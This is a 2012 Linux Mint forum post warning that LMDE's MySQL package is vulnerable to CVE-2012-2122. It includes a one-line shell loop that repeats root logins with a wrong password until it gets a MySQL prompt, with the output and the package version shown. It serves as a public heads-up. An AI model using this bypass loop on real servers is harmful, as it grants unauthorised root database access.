LMDE and mysql CVE-2012-2122

Discuss non-support related topics related to LMDE.
Forum rules
Before you post please read this

LMDE and mysql CVE-2012-2122

Postby scottlinux on Mon Jun 11, 2012 7:03 pm

Heads up on a big mysql vuln going around,

https://community.rapid7.com/community/ ... w-in-mysql

http://security-tracker.debian.org/trac ... -2012-2122

LMDE update pack 4 - 64bit appears to be vulnerable

Code: Select all
stmiller@brahms:~$ sudo /etc/init.d/mysql start
[sudo] password for stmiller:
Starting MySQL database server: mysqld.
Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..
stmiller@brahms:~$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 161
Server version: 5.1.61-2 (Debian)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


Code: Select all
stmiller@brahms:~$ dpkg -s mysql-server
Package: mysql-server
Status: install ok installed
Priority: optional
Section: database
Installed-Size: 65
Maintainer: Debian MySQL Maintainers <pkg-mysql-maint@lists.alioth.debian.org>
Architecture: all
Source: mysql-5.1
Version: 5.1.61-2
Depends: mysql-server-5.1
Description: MySQL database server (metapackage depending on the latest version)
 This is an empty package that depends on the current "best" version of
 mysql-server (currently mysql-server-5.1), as determined by the MySQL
 maintainers. Install this package if in doubt about which MySQL
 version you need. That will install the version recommended by the
 package maintainers.
 .
 MySQL is a fast, stable and true multi-user, multi-threaded SQL database
 server. SQL (Structured Query Language) is the most popular database query
 language in the world. The main goals of MySQL are speed, robustness and
 ease of use.
Homepage: http://dev.mysql.com/
stmiller@brahms:~$
scottlinux
Level 1
Level 1
 
Posts: 27
Joined: Sun May 15, 2011 12:00 am

Linux Mint is funded by ads and donations.
 

Return to Open Discussion

Who is online

Users browsing this forum: No registered users and 5 guests